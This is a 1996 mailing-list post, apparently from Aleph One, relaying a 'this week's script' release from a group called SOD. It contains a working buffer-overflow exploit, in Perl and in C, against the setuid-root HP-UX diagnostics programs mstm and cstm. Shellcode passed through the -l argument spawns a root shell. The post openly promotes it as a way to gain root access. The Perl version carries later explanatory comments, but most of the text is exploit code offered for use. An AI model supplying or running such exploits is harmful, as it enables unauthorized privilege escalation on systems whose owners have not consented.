This week: turn me on, dead man

Aleph One (aleph1@underground.org)
Sat, 16 Nov 1996 11:38:33 -0800


energizer bunny. They keep going, and going, and going.



Aleph One / aleph1@underground.org

http://underground.org/

KeyID 1024/948FD6B5

Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01



--- cut here ---

   Well, hello. Welcome back. We're glad to see you. Have a drink. Take

   off that overcoat. Put down that submachine gun. Lie on the couch and

   pretend you're a duck. I'll be over here sending scripts to the

   masses. This week's script is the first of the buffer-overruns and it

   buggers up two very similar setuid root programs in /usr/diag/bin,

   mstm and cstm. It's only been playtested on the 9's, so use with care

   on the 10's, and as always, start clicking your way to root access

   with scripts from the folks at SOD.



Caveat Emptor



   mstm and/or cstm loves you perl script and C src for this week



--- stmo.pl ---

#!/usr/bin/perl



# working exploit for 9.X setuid root /usr/diag/bin/[cm]stm



use FileHandle;



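sub h2cs {
  # Decode a string of hex digit pairs ("4142") into the raw bytes they
  # denote ("AB").  Used below to turn the listed instruction words into
  # bytes.
  #
  # Args:    $hex - string of hex digits, even length, either case
  # Returns: the decoded byte string ("" for empty input)
  # Dies:    on an odd-length or non-hex string.  The original version
  #          spun forever on odd-length input, because once a single
  #          digit was left neither of its two regexes matched and the
  #          loop condition never changed.
  my ($hex) = @_;
  $hex = '' unless defined $hex;
  die "h2cs: expected an even number of hex digits, got '$hex'"
    if length($hex) % 2 || $hex !~ /\A[0-9A-Fa-f]*\z/;
  # pack 'H*' is the built-in hex-to-bytes conversion; it accepts both
  # cases, matching the old oct("0x..") behaviour for valid input.
  return pack('H*', $hex);
}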



# Build the string that is handed to mstm as the value of "-l".  From the
# lengths used below its layout is: 2 alignment bytes plus instruction
# words, padded with "C" to 208 bytes; a 16-byte string padded with "D";
# then one trailing 4-byte word.
$code="AA"; # two byte alignment

# Each h2cs() call appends one 32-bit word; the trailing comment on each
# line is the author's own disassembly of that word (not verified here).
$code.=h2cs("34010102"); # ldi 129,r1
$code.=h2cs("08220401"); # sub rp,r1,r1
$code.=h2cs("602002a6"); # stb r0,339(r1)
#$code.=h2cs("602002ac"); # stb r0,342(r1)
$code.=h2cs("b43a0298"); # addi 332,r1,arg0
$code.=h2cs("34160176"); # ldi 187,r22
$code.=h2cs("34010276"); # ldi 315,r1
$code.=h2cs("08360216"); # and r22,r1,r22
$code.=h2cs("20200801"); # ldil l%c0000004,r1
$code.=h2cs("e420e008"); # ble 4(sr7,r1)
$code.=h2cs("08210280"); # NOP == xor r1,r1,r0
#$code.=h2cs("deadcafe"); # illegal instruction

# Pad the instruction block out to exactly 208 bytes.  ("C" x $num is the
# empty string if $num is negative, so an over-long block is not caught.)
$num=208-length($code);
$code.="C"x$num;

# 16-byte string block, padded with "D" to the fixed size.
$data="/bin/sh.sh.";
$num=16-length($data);
$data.="D"x$num;

# NOTE(review): $of has not been assigned yet, so this evaluates 224-0,
# and $num is never read again -- a dead statement.  (208 + 16 = 224 is
# the length of $code.$data before the trailing word is appended.)
$num=224-length($of);
$of=$code.$data;
$of.=h2cs("7b03301B");
print "Length is: ",length($of),"\n";

# Replace this process with mstm, passing the assembled string as the -l
# argument; the over-long value is what triggers the overrun described in
# the post.  List-form exec, so no shell is involved.
exec("/usr/diag/bin/mstm","-l","$of");



--- stmo.c ---

/* SOD /usr/diag/bin/[cm]stm buffer overflow */



/* C form of the same overflow as stmo.pl above.  The payload is a single
 * compile-time literal rather than being assembled; it is not byte-for-byte
 * the string the Perl script builds (it keeps the second "stb" word that the
 * Perl script comments out, and its 16-byte string part differs).
 *
 * No headers are included and main() carries no return type or return
 * statement: this relies on pre-C99 implicit int and implicit declarations
 * of strcpy() and execl(), and will not compile under a modern strict
 * compiler without adding <string.h> and <unistd.h>. */
main()
{
/* Local copy of the literal.  The literal is a few hundred bytes, well under
 * the 500 allocated, so buf itself is not overrun by the strcpy(). */
char buf[500];



strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b");



/* Hand the payload to mstm as the value of -l.  execl() only returns on
 * failure, so the cstm call below runs only if mstm could not be exec'd. */
execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);

/* Either-or, same overflow */

execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);

}